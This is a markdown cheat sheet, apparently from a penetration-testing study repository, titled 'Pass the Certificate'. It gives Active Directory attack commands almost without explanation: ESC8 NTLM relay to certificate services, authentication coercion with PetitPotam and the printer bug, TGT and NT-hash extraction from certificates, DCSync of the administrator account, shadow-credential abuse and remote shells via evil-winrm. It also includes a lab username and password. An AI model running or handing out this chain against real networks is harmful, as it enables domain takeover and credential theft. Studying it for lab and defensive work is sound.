Skip to content

Latest commit

 

History

History
79 lines (54 loc) · 1.96 KB

File metadata and controls

79 lines (54 loc) · 1.96 KB

Pass the Certificate

Overview

  • Abuse Active Directory Certificate Services (ADCS) to obtain certificates that can be used for authentication
  • Most common: ESC8 (NTLM relay to ADCS web enrollment)

ESC8 - NTLM Relay to ADCS Web Enrollment

Set Up Relay

# Template depends on target - DomainController for DCs, KerberosAuthentication for others
ntlmrelayx.py -debug -smb2support --target http://<CA_HOST>/certsrv/certfnsh.asp --adcs --template DomainController

Coerce Authentication

# PetitPotam (MS-EFSRPC) - often works unauthenticated
python3 PetitPotam.py <attacker_ip> <dc_ip>

# Printer Bug (MS-RPRN) - requires valid creds
python3 printerbug.py INLANEFREIGHT.LOCAL/wwhite:"package5shores_topher1"@10.129.234.109 10.10.16.12

Obtain TGT from Certificate

python3 gettgtpkinit.py <DOMAIN>/<DC$> -cert-pfx <cert.pfx> -dc-ip <dc_ip> dc.ccache

DCSync with Machine Account TGT

export KRB5CCNAME=dc.ccache
secretsdump.py -just-dc-user <DOMAIN>/administrator -k -no-pass <DC_FQDN>

Alternative: Get NT Hash Directly from TGT

python3 getnthash.py -key <as_rep_key> <DOMAIN>/<DC$>

Certipy (All-in-One Alternative)

certipy auth -pfx <cert.pfx> -dc-ip <dc_ip> -domain <DOMAIN>

# If PKINIT fails (DC doesn't support it), fall back to ldap-shell
certipy auth -pfx <cert.pfx> -dc-ip <dc_ip> -ldap-shell

Windows: Rubeus with Certificate

.\Rubeus.exe asktgt /user:<DC$> /certificate:<base64_cert> /ptt

Shadow Credentials (msDS-KeyCredentialLink)

Add Shadow Credential (Linux)

pywhisker --dc-ip <dc_ip> -d <DOMAIN> -u <user> -p '<pass>' --target <target_user> --action add

Obtain TGT from Shadow Credential PFX

python3 gettgtpkinit.py -cert-pfx <cert.pfx> -pfx-pass '<password>' -dc-ip <dc_ip> <DOMAIN>/<target_user> /tmp/target.ccache

Use the TGT

export KRB5CCNAME=/tmp/target.ccache
evil-winrm -i <dc_fqdn> -r <domain>